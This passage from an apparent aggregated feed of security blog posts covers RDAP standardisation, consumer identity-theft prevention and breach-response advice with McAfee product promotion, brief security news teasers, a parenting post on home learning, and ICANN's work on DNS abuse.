The IETF made multiple attempts to add features to WHOIS to address some of these issues, but none of them were widely adopted. A possible replacement protocol known as the Internet Registry Information Service (IRIS) was standardized in 2005, but it was not widely adopted. Something else was needed, and the IETF went back to work to produce what became known as RDAP.

RDAP was specified in a series of five IETF Proposed Standard RFC documents, including the following, all of which were published in March 2015:

• RFC 7480, HTTP Usage in the Registration Data Access Protocol (RDAP)
• RFC 7481, Security Services for the Registration Data Access Protocol (RDAP)
• RFC 7482, Registration Data Access Protocol (RDAP) Query Format
• RFC 7483, JSON Responses for the Registration Data Access Protocol (RDAP)
• RFC 7484, Finding the Authoritative Registration Data (RDAP) Service

Only when RDAP was standardized did we start to see broad deployment of a possible WHOIS successor by domain name registries, domain name registrars and address registries.

The broad deployment of RDAP led to RFCs 7480 and 7481 becoming Internet Standard RFCs (part of Internet Standard 95) without modification in March 2021. As operators of registration data directory services implemented and deployed RDAP, they found places in the other specifications where minor corrections and clarifications were needed without changing the protocol itself. RFC 7482 was updated to become Internet Standard RFC 9082, which was published in June 2021. RFC 7483 was updated to become Internet Standard RFC 9083, which was also published in June 2021. All were added to Standard 95. As of the writing of this article, RFC 7484 is in the process of being reviewed and updated for elevation to Internet Standard status.

RDAP Advantages

Operators of registration data directory services who implemented RDAP can take advantage of key features not available in the WHOIS protocol. I’ve highlighted some of these important features in the table below.

RDAP Feature	Benefit
Standard, well-understood, and widely available HTTP transport	Relatively easy to implement, deploy and operate using common web service tools, infrastructure and applications.
Securable via HTTPS	Helps provide confidentiality for RDAP queries and responses, reducing the amount of information that is disclosed to monitors.
Structured output in JavaScript Object Notation (JSON)	JSON is well-understood and tool friendly, which makes it easier for clients to parse and format responses from all servers without the need for software that’s customized for different service providers.
Easily extensible	Designed to support the addition of new features without breaking existing implementations. This makes it easier to address future function needs with less risk of implementation incompatibility.
Internationalized output, with full support for Unicode character sets	Allows implementations to provide human-readable inputs and outputs that are represented in a language appropriate to the local operating environment.
Referral capability, leveraging HTTP constructs	Provides information to software clients that allow the client to retrieve additional information from other RDAP servers. This can be used to hide complexity from human users.
Support of standardized authentication	RDAP can take full advantage of all of the client identification, authentication and authorization methods that are available to web services. This means that RDAP can be used to provide the basic framework for differentiated access to registration data based on attributes associated with the user and the user’s query.

Verisign and RDAP

Verisign’s RDAP service, which was originally launched as an experimental implementation several years before gaining widespread adoption, allows users to look up records in the registry database for all registered .com, .net, .name, .cc and .tv domain names. It also supports Internationalized Domain Names (IDNs).

We at Verisign were pleased not only to see the IETF recognize the importance of RDAP by elevating it to an Internet Standard, but also that the protocol became a requirement for ICANN-accredited registrars and registries as of August 2019. Widespread implementation of the RDAP protocol makes registration data more secure, stable and resilient, and we are hopeful that the community will evolve the prescribed implementation of RDAP such that the full power of this rich protocol will be deployed.

You can learn more in the RDAP Help section of the Verisign website, and access helpful documents such as the RDAP technical implementation guide and the RDAP response profile.

The post Industry Insights: RDAP Becomes Internet Standard appeared first on Verisign Blog.

How to Check if Someone is Using Your Identity

A good time to check if someone is using your identity is before it even happens. 

One of identity theft’s several downsides is how people discover they’ve become a victim in the first place—by surprise. They go to rent an apartment, open a line of credit, or apply for financing, only to discover that their finances or reputation has taken a hit because of identity thief.  

And those hits add up, particularly when you look at the dollars involved. In 2020, the Federal Trade Commission (FTC) reported $3.3 billion in financial losses from 4.7 million reported cases of fraud, a 45% increase over the year prior. Of those reports, identity theft was the leading fraud category, accounting for 29% of fraud incidents.  

What’s at risk?  

Plenty. Depending on the type and amount of information an identity thief gets their hands on, they can harm your finances and reputation in several ways, including: 

• Open utility accounts in your name 
• Use your credit cards for purchases 
• Hijack your email 
• Claim healthcare expenses under your insurance 
• Steal your tax refund
• Even use your identity when they’re arrested for a crime 

Rather than ending up with a rude and potentially costly surprise of your own, you can get ahead of thieves by checking to see if someone is using your identity before it’s a problem or before it really takes root. 

The Neiman Marcus breach: now is a good time to check your identity 

Major data breaches that expose personal information seem to hit the headlines with some regularity, not to mention the many, many more that don’t get national or international press coverage. Most recently we have the Neiman Marcus breach, where this major retailer alerted 4.6 million customers that “an unauthorized party obtained personal information associated with certain Neiman Marcus customers’ online accounts.”  

And as it is with many such breaches, it took quite some time before the theft of information was discovered. Per Neiman Marcus, it’s believed that the breach occurred in May 2020 and only discovered in September of 2021. Potentially compromised information included: 

• Names and contact information 
• Payment card numbers and expiration dates (without CVV numbers) 
• Neiman Marcus virtual gift card numbers (without PINs) 
• Usernames, passwords, and security questions of Neiman Marcus online accounts 

Whether or not you have reason to suspect that your information got caught up in this recent large-scale breach, it serves as a good reminder that any time is the right time to check up on your identity. Acting now can save headaches, potentially big headaches, later. 

How you can protect yourself from identity theft right now 

Quite a bit of identity theft prevention begins with taking stock of the accounts and services you have in your name. This ranges anywhere from bank accounts to public utilities and from credit cards to loans, all of which contain varying degrees of personal information about you. With a sense of where your personal identity is being used, you can better look for instances where it’s being misused. 

Ways you can spot for possible identity theft include: 

Track your bills and when they are due. 

If you stop receiving a bill that normally comes to you, such as a utility bill or for a department store credit card, that could be a sign that a thief has changed the mailing address and has potentially hijacked your identity. 

Check your statements and accounts for irregularities.

This is rather straightforward, yet it reminds us how important it is to look at our statements closely. Charges that you didn’t ring up or that seem slightly higher than normal are a surefire sign that you should follow up with the bank or company involved and let them know of possible fraud. 

Review your credit reports. 

In the U.S., you have annual access to free credit reports from the major credit reporting agencies. Not only will this give you a sense of your credit score, but it will also show the credit that’s open in your name, along with addresses associated with your identity. Spotting an account that you haven’t signed up for or seeing an address of a residence that you’re not renting are other common signs that your identity may have been compromised. 

Sign up for credit monitoring services. 

With the number of accounts many of us have these days, a credit monitoring service can help you stay on top of what’s happening in your name. Often offered through banks, credit unions, and even insurance providers, credit monitoring can alert you in several instances, including: 

• When a company checks your credit history. 

• If new loan or credit card appears in your name. 
• Changes in your address or phone number. 

Overall, credit monitoring can act as another set of eyes for you and spot potential identity issues. Different services provide different levels of monitoring, so consider reviewing a few options to find the one that works best for you. 

Consider an identity protection service.

One like our own Identity Protection Service will monitor several types of personally identifiable information, alert you of potentially stolen personal info, and offer guided help to neutralize the threat—in addition to offering several preventative steps to help keep theft from happening in the first place. With this set up on your computers and smartphone you can stay in the know and address issues immediately. 

Five extra steps for preventing identity theft 

Along with keeping an eye on what’s happening with your identity online and elsewhere, there are a few more things you can do to make it tougher for thieves to steal your identity. 

1) Protect your digital files and devices. 

Given all the banking and shopping we do on our computers and phones, installing and using comprehensive online protection software is a must these days. It puts several layers of security in place, such as creating complex passwords automatically, shielding credit card info from prying eyes, and protecting your privacy and data online by connecting with a VPN. In short, online protection software acts as a solid first line of defense. 

2) Protect your accounts with strong passwords and multi-factor authentication. 

As mentioned above, comprehensive online protection software often includes a password manager that can generate strong, unique passwords for each of your accounts and remember them for you. It’s extra protection that makes life a lot easier for you by managing all the accounts you’re juggling. Also, use MFA (multi-factor authentication) on the accounts that give you the option, which makes it harder for a thief to crack your accounts with a password alone. 

3) Shred sensitive documents when you’re done with them. 

Sensitive documents come in all forms. Top-of-the-line examples include things like tax returns, bank statements, and financial records. Yet there are also things like your phone and utility bills, statements from your doctor’s office, and offers that come to you via mail. Together, these things can contain personal information such as account numbers, your full Social Security Number, the last four digits of your Social Security Number (which can still be useful to thieves), and other information that may uniquely identify you. You’ll want to dispose of sensitive documents like these so that they can’t be harvested by hackers. 

For physical documents, consider the low-cost investment of a paper shredder to help ensure they don’t fall into the wrong hands when you are done with them. (And let’s face it, they’re fun to use!) For digital documents, simply deleting a file is not enough – online protection software is a great resource that often includes a digital document shredder, designed to render the data practically unusable when you’re ready to trash the file. 

4) Keep your Social Security Number to yourself. 

Your Social Security Number is one of the most prized possessions a thief can run away with because it is so closely associated with you and things like your tax returns, employment, and so on. Keep it stored in a safe location rather than on your person or in your wallet. Likewise, be careful about giving out your SSN. While organizations like the IRS, your bank, and employer require it, there are other organizations who do not—but may ask for it anyway. (Doctor’s offices are a prime example.) If you get such a request, ask them what they intend to use it for and then ask if another form of identification will work instead.  

5) Keep an eye out for phishing attacks. 

Phishing attacks are one of the primary ways identity thieves steal personal information. Whether they come via a direct message, on social media, or through email, text, or phone calls, thieves use them to harvest your personal info by posing as a legitimate organization—such as in this recent IRS phishing scam. Phishing is a topic all unto itself, and you can check out this quick read to see how you can spot phishing scams and protect yourself from them. 

No surprises 

Like any criminal, identity thieves do their dirtiest work in the shadows—quietly stealing money under your nose, or worse, as we outlined above. By shining a light on your identity and keeping regular track of what’s happening with it, you can spot unusual activity right away. Even the small stuff is important. A co-worker of mine once saw an incorrect address listed on his credit report. Turned out, that address was used to rack up several large charges at a retailer, which he was able to fix with the aid of the credit reporting agency and the retailer in question.  

No doubt about it. Identity theft is indeed on the rise, and your best bet to avoid such a nasty surprise is to keep an eye on your digital identity the same way you keep an eye on your actual wallet. 

The post How to Check if Someone is Using Your Identity appeared first on McAfee Blog.

Top Signs of Identity Theft

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.  

A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation.  

How does identity theft happen in the first place?  

Unfortunately, it can happen in several ways.   

In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).   

In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who’re shopping or banking online without the security of a VPN.    

Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to nearly 1.4 million in 2020—practically double. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft:  

• Online ads that direct you to a scammer’s site are designed to steal your information.  
• Malicious websites and apps also steal information when you use them.  
• Social media scams lure you into providing personal information, whether through posts or direct messages.  

However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media.  

What are some signs of identity theft?  

Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include:  

• You start getting mail for accounts that you never opened.   
• Statements or bills stop showing up from your legitimate accounts.  
• You receive authentication messages for accounts you don’t recognize via email, text, or phone.   
• Debt collectors contact you about an account you have no knowledge of.  
• Unauthorized transactions, however large or small, show up in your bank or credit card statements.  
• You apply for credit and get unexpectedly denied.  
• And in extreme cases, you discover that someone else has filed a tax return in your name.  

As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.   

Steps to take if you suspect that you’re the victim of identity theft  

The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take:  

1) Notify the companies and institutions involved  

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.   

2) File a police report  

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well.  

3) Contact the Federal Trade Commission (FTC)  

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.  

4) Place a fraud alert and consider a credit freeze  

You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name.  

A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready.  

5) Dispute any discrepancies in your credit reports  

This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.   

6) Contact the IRS, if needed  

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid from an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them.  

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.  

7) Continue to monitor your credit report, invoices, and statements  

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely.  

Preventing identity theft 

With all the time we spend online as we bank, shop, and simply surf, we create and share all kinds of personal information—information that can get collected and even stolen. The good news is that you can prevent theft and fraud with online protection software, such as McAfee+ Ultimate.  

With McAfee+ Ultimate you can: 

• Monitor your credit activity on all three major credit bureaus to stay on top of unauthorized use.​ 
• Also monitor the dark web for breaches involving your personal info and notify you if it’s found.​ 
• Lock or freeze your credit file to help prevent accounts from being opened in your name. 
• Remove your personal info from over 40 data broker sites collecting and selling it. 
• Restore your identity with a licensed expert should the unexpected happen.​ 
• Receive $1M identity theft and stolen funds coverage along with additional $25K ransomware coverage. 

​In all, it’s our most comprehensive privacy, identity, and device protection plan, built for a time when we rely so heavily on the internet to go about our day, whether that’s work, play, or simply getting things done. 

Righting the wrongs of identity theft: deep breaths and an even keel  

Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer for any questions you’ll face in the process of restoring your identity will help you see things through.  

Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts.  

The post Top Signs of Identity Theft appeared first on McAfee Blog.

Apple ships Monterey with security updates, fixes 0-day in Watch and TV products, updates iDevices

A slew of security bulletins from Apple HQ, including 37 bugs listed as fixed in the initial public release of macOS Monterey.

“Customer complaint” email scam preys on your fear of getting into trouble at work

Stop. Think. Connect. Don't let the crooks trick you into acting in haste.

Kaseya ransomware suspect nabbed in Poland, $6m seized from absent colleague

Suspects nabbed, millions seized, in ransomware busts across the globe.

Protecting Yourself in the Wake of the Robinhood Data Breach

The Robinhood trading platform recently disclosed a data breach that exposed the information of millions of its customers. News of the attack was released on Monday, November 8th along with word the hackers behind it had demanded an extortion payment from the company. 

According to Robinhood’s disclosure, the attack occurred on November 3rd, which allowed an unauthorized party to obtain the following: 

• Email addresses for some 5 million people. 
• Full names for another group of 2 million people. 

In addition, smaller groups of Robinhood customers had yet more information compromised. Around 310 people had their names, birth dates, and zip codes exposed in the breach. Another 10 customers had “more extensive account details revealed,” per Robinhood’s disclosure.  

Robinhood went on to say, “We believe that no Social Security numbers, bank account numbers, or debit card numbers were exposed and that there has been no financial loss to any customers as a result of the incident.” 

Robinhood further stated that the company contained the intrusion and that it promptly informed law enforcement of the extortion demand. Robinhood says that it is continuing to investigate the incident with the assistance of a security firm. 

The company advised its customers to visit the Robinhood help center to receive the latest messages from the company, noting that they will never include a link to access an account in a security alert. 

Any data breach that you and your information may have been involved in calls for a few quick security steps: 

1. Log into your account and update your password with a new one that is strong and unique. Likewise, if you use the same or similar passwords across several accounts, change those as well. (A password manager that’s included with comprehensive online protection software can do that work for you.) Set up two-factor authentication if your account allows for it, as this will provide an extra layer of protection as well. 

2. Review your statements for any strange activity—even the smallest of withdrawals or transactions could be the sign of a larger issue. 

3. Report any suspected fraud to the company or institution involved. They typically have set policies and procedures in place to provide support. 

If you believe that you’ve become a victim of identity theft, file a report with local law enforcement and the Federal Trade Commission (FTC). Law enforcement can provide you with a case number that you may need as part of the recovery process. Likewise, the FTC’s identity theft website provides excellent resources, including a recovery plan and a step-by-step walkthrough if you create an account with them. 

For even more information, visit our blog that points out the signs of identity theft and the steps you can take should you find yourself victim.  

After the breach, keep a sharp eye out 

Given that the breach apparently exposed some 5 million email addresses, there’s the risk that these may end up in the hands of bad actors who may use them for follow-on attacks.  

Notable among them would be phishing attacks, where hackers could target Robinhood users with phony messages in an attempt to get affected users to reveal further account information. For example, hackers could potentially create bogus emails that appear to come from Robinhood and direct users to a malicious site that requests account information. As Robinhood stated, the company will never include a link to access an account in a security alert. Users should visit the Robinhood site directly for account information. 

This breach could lead to other phishing attacks as well, ones that may or may not pose as communication from Robinhood. Some of these phishing attacks can be rather easy to spot, as they may include typos, poorly rendered logos, or spoofed web addresses. However, some sophisticated hackers can roll out rather polished phishing attacks that can closely resemble legitimate communications.  

In all, people can avoid falling victim to phishing attacks by keeping the following in mind: 

1. Only access your accounts directly from the official website of the company or financial institution involved. If you receive an email, message, or text alerting you of an issue, do not click any links provided in the communication. Go straight to the site yourself by typing in the proper address and view your account information there. Likewise, calling the customer support line posted on their official site is an option as well. 

2. Use comprehensive online protection software that includes a spam filter. This can prevent phishing emails from reaching your inbox in the first place. 

3. Get to know the signs of phishing emails. A common sign of a scam is an email, ad, message, or site that simply doesn’t look or read right. (Maybe the grammar is awkward or the logo is grainy or has the colors slightly wrong.) However, some of them can look quite convincing, yet there are still ways to spot an attempted phishing attack. 

4. Beware of email attachments you aren’t expecting. This is always good form because hackers love to spike attachments with malware that’s designed to steal your personal information. Whether you get an unexpected attachment from a friend or business, follow up before opening it. That’s a quick way to find out if the attachment is legitimate or not. 

For more info on phishing and how to steer clear of it, check out our blog on how to spot phishing attacks. 

Protect your identity for the long haul 

The unfortunate fact is that data breaches can and do happen. Many of the larger data breaches make the headlines, yet many more do not—such as the ones that hit small businesses, restaurants, and medical care providers. In the hands of hackers, the information spilled by these breaches can provide them with the building blocks to commit identity theft. As a result, keeping on top of your identity and personal information is a must. 

The good news is that you have solid options to prevent them from harming you or at least greatly lessen their potential impact. With identity theft protection, even in the short-term, you can monitor emails addresses and usernames that are being used to breach other accounts. You can monitor dozens of different types of personal information and receive alerts to keep an eye out for misuse. Likewise, it can monitor your email addresses and bank accounts for signs of misuse or fraud, plus provide theft protection and support from a recovery specialist if identity theft, unfortunately, happens to you. 

Along those same lines, news of a data breach offers all of us a moment to pause and take stock of just how protected we are. Above and beyond the steps covered above, comprehensive online protection can protect your devices from malware, phishing attacks, malicious websites, and other threats. More importantly, it protects you—your identity and privacy, particularly in times where breaches such as the one we’re talking about here occur with seeming regularity.  

The post Protecting Yourself in the Wake of the Robinhood Data Breach appeared first on McAfee Blog.

Patch Tuesday updates the Win 7 updater… for at most 1 more year of updates

The clock stopped long ago on Windows 7, except for those who paid for overtime. But there won't be any double overtime!

FBI email hack spreads fake security alerts. Here’s what to do…

Fake warnings and false accusations - it's a "call to distraction"

S3 Ep59: Emotet, an FBI hoax, Samba bugs, and a hijackable suitcase [Podcast]

Latest episode - listen now!

What We’ve Learnt From Home Learning During Lockdown

I think it’s fair to say that come to next Australia Day, there needs to be a special award category for parents of young children who survived home learning during the lockdowns. Let’s be honest – it’s been brutal! So many parents had to juggle their own full-time work, running a household, AND supervising a day’s worth of learning for often, multiple children! Research from Macquarie University showed that many parents spent up to 14 hours a week in their role as home learning managers and 9/10 parents reported the experience as, quite understandably, stressful! As a mum of older teens and young adults – who are usually self-sufficient – I’m in awe! 

But the good news is – things are on the improve! Our vaccine rates are amongst the best in the world, so lockdowns have been lifted and, drum roll… kids are back at school! I’ve always been a big fan of trying to find the silver lining of any situation and I think there are many we can take away from our COVID experience, particularly when it comes to digital parenting. I know of so many parents who have completely rethought their approach to managing kids and technology since the pandemic hit because of their home learning experience. 

So, in the spirit of sharing and caring, I thought I’d round up some of the best ‘aha’ moments from parents who were forced to become expert home learning managers over multiple lockdowns. And make sure you take notes because there are some great learnings that we can apply to our digital parenting journey.  

Embrace Technology 

If you have never been ‘all in’ with your kids’ use of technology for both learning and socializing, then you need to get over this ASAP. Technology is the lifeblood of your kids’ lives. It’s how they connect, nurture friendships, and organize their social lives. I also recommend parents try to see technology through the eyes of their kids NOT just through our more ‘mature’ lens. It’s the best way of truly understanding just what a huge role it plays in their day-to-day lives. And don’t forget that technology is almost always used to set up in-person catchups! So, please don’t demonize it, it will only push your kids away. 

Understanding Your Child’s Online Life is a Powerful Way of Connecting 

I totally appreciate that many parents didn’t choose to be home learning ‘managers’ however many have shared with me how they now feel far more involved in their child’s life because of the experience. Seeing first-hand how your child’s day works, overhearing their conversations with teachers and peers (courtesy of Zoom), and being blown away by your offspring’s tech skills has given many parents incredible insight into their child.  

I know of parents who have noticed learning issues and friendship problems all as a result of their home learning manager role! There’s nothing like being able to nip something in the bud before it becomes a big issue! So, stay involved and you’ll reap the rewards! 

Get Your Kids Moving – Encourage Movement and Outdoor Activities Always 

Confession – I have never been one of those parents who proactively organized park visits, bushwalks, and exercise regimes for my kids. But many of the parents who managed young children through a lockdown and resorted to becoming personal trainers reported that it paid dividends. So, now lockdowns are (hopefully!) history, don’t forget about the benefits of getting your kids to move. It’s hard to be on a screen when you are walking the dog, playing a game of family cricket, or bushwalking. I know it’s time-consuming but it’s so worth it!

Take Some Time to Understand & Protect Your Kids’ Devices 

As of 2 years ago, the average Aussie household had 17 internet-connected devices in tow so it’s no wonder keeping abreast of all the devices in your household feels like a full-time job! But with kids continuing to use their devices for both study and socializing, it’s essential that you give each device a ‘once over’ to minimize risks and prevent issues arising down the track.  

Ensuring all their software is up to date is a great place to start. Also check that the default password has been changed and that there is some top-shelf security software installed to protect the device and, most importantly, its user! And while you are there, why not also ensure that each of their online accounts has its own distinct password? If you think they could manage a password manager, then it might be time to introduce them to one? Check out McAfee’s True Key – I couldn’t manage without it! 

I think you’d be hard-pressed to find many parents keen to return to home learning. In fact, I think there may even be a revolt if we had to go back! But, knowing we have picked up some ‘nuggets of gold’ along the way makes it a little feel a little better! So, please embrace technology – it’s a fantastic way of connecting with your kids. But of course, keep your family’s usage in check and minimize the risks by giving each device a once-over.  

Happy Digital Parenting! 

Alex  

The post What We’ve Learnt From Home Learning During Lockdown appeared first on McAfee Blog.

Ongoing Community Work to Mitigate Domain Name System Security Threats

For over a decade, the Internet Corporation for Assigned Names and Numbers (ICANN) and its multi-stakeholder community have engaged in an extended dialogue on the topic of DNS abuse, and the need to define, measure and mitigate DNS-related security threats. With increasing global reliance on the internet and DNS for communication, connectivity and commerce, the members of this community have important parts to play in identifying, reporting and mitigating illegal or harmful behavior, within their respective roles and capabilities.

As we consider the path forward on necessary and appropriate steps to improve mitigation of DNS abuse, it’s helpful to reflect briefly on the origins of this issue within ICANN, and to recognize the various and relevant community inputs to our ongoing work.

As a starting point, it’s important to understand ICANN’s central role in preserving the security, stability, resiliency and global interoperability of the internet’s unique identifier system, and also the limitations established within ICANN’s bylaws. ICANN’s primary mission is to ensure the stable and secure operation of the internet’s unique identifier systems, but as expressly stated in its bylaws, ICANN “shall not regulate (i.e., impose rules and restrictions on) services that use the internet’s unique identifiers or the content that such services carry or provide, outside the express scope of Section 1.1(a).” As such, ICANN’s role is important, but limited, when considering the full range of possible definitions of “DNS Abuse,” and developing a comprehensive understanding of security threat categories and the roles and responsibilities of various players in the internet infrastructure ecosystem is required.

In support of this important work, ICANN’s generic top-level domain (gTLD) contracted parties (registries and registrars) continue to engage with ICANN, and with other stakeholders and community interest groups, to address key factors related to effective and appropriate DNS security threat mitigation, including:

• Determining the roles and responsibilities of the various service providers across the internet ecosystem;
• Delineating categories of threats: content, infrastructure, illegal vs. harmful, etc.;
• Understanding the precise operational and technical capabilities of various types of providers across the internet ecosystem;
• Relationships, if any, that respective service providers have with individuals or entities responsible for creating and/or removing the illegal or abusive activity;
• Role of third-party “trusted notifiers,” including government actors, that may play a role in identifying and reporting illegal and abusive behavior to the appropriate service provider;
• Processes to ensure infrastructure providers can trust third-party notifiers to reliably identify and provide evidence of illegal or harmful content;
• Promoting administrative and operational scalability in trusted notifier engagements;
• Determining the necessary safeguards around liability, due process, and transparency to ensure domain name registrants have recourse when the DNS is used as a tool to police DNS security threats, particularly when related to content.
• Supporting ICANN’s important and appropriate role in coordination and facilitation, particularly as a centralized source of data, tools, and resources to help and hold accountable those parties responsible for managing and maintaining the internet’s unique identifiers.

Definitions of Online Abuse

To better understand the various roles, responsibilities and processes, it’s important to first define illegal and abusive online activity. While perspectives may vary across our wide range of interest groups, the emerging consensus on definitions and terminology is that these activities can be categorized as DNS Security Threats, Infrastructure Abuse, Illegal Content, or Abusive Content, with ICANN’s remit generally limited to the first two categories.

• DNS Security Threats: defined as being “composed of five broad categories of harmful activity [where] they intersect with the DNS: malware, botnets, phishing, pharming, and spam when [spam] serves as a delivery mechanism for those other forms of DNS Abuse.”
• Infrastructure Abuse: a broader set of security threats that can impact the DNS itself – including denial-of-service / distributed denial-of-service (DoS / DDoS) attacks, DNS cache poisoning, protocol-level attacks, and exploitation of implementation vulnerabilities.
• Illegal Content: content that is unlawful and hosted on websites that are accessed via domain names in the global DNS. Examples might include the illegal sale of controlled substances or the distribution of child sexual abuse material (CSAM), and proven intellectual property infringement.
• Abusive Content: is content hosted on websites using the domain name infrastructure that is deemed “harmful,” either under applicable law or norms, which could include scams, fraud, misinformation, or intellectual property infringement, where illegality has yet to be established by a court of competent jurisdiction.

Behavior within each of these categories constitutes abuse, and it is incumbent on members of the community to actively work to combat and mitigate these behaviors where they have the capability, expertise and responsibility to do so. We recognize the benefit of coordination with other entities, including ICANN within its bylaw-mandated remit, across their respective areas of responsibility.

ICANN Organization’s Efforts on DNS Abuse

The ICANN Organization has been actively involved in advancing work on DNS abuse, including the 2017 initiation of the Domain Abuse Activity Reporting (DAAR) system by the Office of the Chief Technology Officer. DAAR is a system for studying and reporting on domain name registration and security threats across top-level domain (TLD) registries, with an overarching purpose to develop a robust, reliable, and reproducible methodology for analyzing security threat activity, which the ICANN community may use to make informed policy decisions. The first DAAR reports were issued in January 2018 and they are updated monthly. Also in 2017, ICANN published its “Framework for Registry Operators to Address Security Threats,” which provides helpful guidance to registries seeking to improve their own DNS security posture.

The ICANN Organization also plays an important role in enforcing gTLD contract compliance and implementing policies developed by the community via its bottom-up, multi-stakeholder processes. For example, over the last several years, it has conducted registry and registrar audits of the anti-abuse provisions in the relevant agreements.

The ICANN Organization has also been a catalyst for increased community attention and action on DNS abuse, including initiating the DNS Security Facilitation Initiative Technical Study Group, which was formed to investigate mechanisms to strengthen collaboration and communication on security and stability issues related to the DNS. Over the last two years, there have also been multiple ICANN cross-community meeting sessions dedicated to the topic, including the most recent session hosted by the ICANN Board during its Annual General Meeting in October 2021. Also, in 2021, ICANN formalized its work on DNS abuse into a dedicated program within the ICANN Organization. These enforcement and compliance responsibilities are very important to ensure that all of ICANN’s contracted parties are living up to their obligations, and that any so-called “bad actors” are identified and remediated or de-accredited and removed from serving the gTLD registry or registrar markets.

The ICANN Organization continues to develop new initiatives to help mitigate DNS security threats, including: (1) expanding DAAR to integrate some country code TLDs, and to eventually include registrar-level reporting; (2) work on COVID domain names; (3) contributions to the development of a Domain Generating Algorithms Framework and facilitating waivers to allow registries and registrars to act on imminent security threats, including botnets at scale; and (4) plans for the ICANN Board to establish a DNS abuse caucus.

ICANN Community Inputs on DNS Abuse

As early as 2009, the ICANN community began to identify the need for additional safeguards to help address DNS abuse and security threats, and those community inputs increased over time and have reached a crescendo over the last two years. In the early stages of this community dialogue, the ICANN Governmental Advisory Committee, via its Public Safety Working Group, identified the need for additional mechanisms to address “criminal activity in the registration of domain names.” In the context of renegotiation of the Registrar Accreditation Agreement between ICANN and accredited registrars, and the development of the New gTLD Base Registry Agreement, the GAC played an important and influential role in highlighting this need, providing formal advice to the ICANN Board, which resulted in new requirements for gTLD registry and registrar operators, and new contractual compliance requirements for ICANN.

